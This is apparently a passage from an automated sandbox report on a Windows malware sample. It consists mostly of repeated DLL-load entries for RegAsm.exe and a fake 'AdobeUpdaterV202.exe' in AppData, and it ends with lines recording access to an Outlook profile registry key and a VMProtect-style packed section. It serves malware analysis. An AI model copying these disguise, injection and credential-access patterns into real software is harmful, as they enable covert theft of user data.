                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: acgenral.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: acgenral.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: msacm32.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: aclayers.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: acgenral.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: acgenral.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: winmm.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: samcli.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: msacm32.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: dwmapi.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: winmmbase.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: aclayers.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: sfc.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: sfc_os.dll
                  Source: C:\Users\user\AppData\Local\AdobeUpdaterV202_55fe1070a367c8a2ee8e8e5d74ec3cf7\AdobeUpdaterV202.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: acgenral.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmmbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Users\user\Desktop\tMO4FVIc9l.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: tMO4FVIc9l.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: tMO4FVIc9l.exeStatic file information: File size 3134976 > 1048576
                  Source: tMO4FVIc9l.exeStatic PE information: Raw size of .vmp is bigger than: 0x100000 < 0x2f9000
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp
                  Source: tMO4FVIc9l.exeStatic PE information: section name: .vmp
                  Source: tMO4FVIc9l.exeStatic PE information: section name: .vmp
                  Source: tMO4FVIc9l.exeStatic PE information: section name: .vmp
